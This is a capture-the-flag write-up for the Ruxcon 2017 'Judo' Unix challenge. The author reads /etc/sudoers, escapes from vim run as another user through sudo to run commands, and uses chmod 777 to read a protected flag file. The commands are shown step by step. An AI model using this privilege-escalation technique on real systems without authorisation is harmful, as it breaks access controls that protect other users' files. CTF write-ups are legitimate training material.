Ruxcon CTF 2017 – Unix1 Write-up

This is my write up for the first Unix challenge at the Ruxcon 2017 security conference capture the flag (CTF).

The challenge was called ‘Judo’ and was worth 100 points.

Upon SSHing to the provided IP address as the jimbob user, we can see that there is one other user called kungfu-steve.

[email protected]:~$ cat /etc/passwd
jimbob:x:1000:1000:,,,:/home/jimbob:/usr/bin/mon
kungfu-steve:x:999:999:,,,:/home/kungfu-steve:/bin/bash

Looking inside this user’s home directory, we can see document.txt, which only allows the kungfu-steve user access.

[email protected]:~$ ls -la /home/kungfu-steve/
total 24
drwxr-xr-x  2 kungfu-steve kungfu-steve 4096 Sep 14 05:44 .
drwxr-xr-x  1 root     	root     	4096 Sep 14 05:44 ..
-rw-r--r-- 19 kungfu-steve kungfu-steve  220 Aug 29 23:36 .bash_logout
-rw-r--r-- 19 kungfu-steve kungfu-steve 3771 Aug 29 23:36 .bashrc
-rw-r--r-- 19 kungfu-steve kungfu-steve  655 Aug 29 23:36 .profile
----------  1 kungfu-steve kungfu-steve   43 Sep 14 05:44 document.txt

As this looks suspiciously like our flag, I figure we need to somehow become kungfu-steve to read the file.

After trying many things I eventually looked at the /etc/sudoers file, which included the following:

[email protected]:~$ cat /etc/sudoers
jimbob ALL=(kungfu-steve) /usr/bin/vim

This basically says that the jimbob user can run vim as kungfu-steve. Using the sudo command shown below, I run vim.

[email protected]o-8w844:~$ sudo -S -u kungfu-steve /usr/bin/vim
sudo: unable to resolve host judo-8w844
[sudo] password for jimbob:

Within vim we can run commands by prefixing them with a !, as shown below.

:!id
uid=999(kungfu-steve) gid=999(kungfu-steve) groups=999(kungfu-steve)

This confirms that we’re running commands as kungfu-steve, as we’re running vim as this user.

I then simply run the below command through vim so that our jimbob user, and anyone else for that matter, can now read the documents.txt file.

:!chmod 777 /home/kungfu-steve/documents.txt

The file can now be read by any user.

[email protected]:/home/kungfu-steve$ ls -la
-rwxrwxrwx  1 kungfu-steve kungfu-steve   43 Sep 14 05:44 document.txt

[email protected]:/home/kungfu-steve$ cat document.txt
Flag{766150e4-83aa-11e6-be47-57c3ba62c51c}

We can now read the contents of the document.txt file as the jimbob user, which contains our flag string.

Leave a Comment

NOTE - You can use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>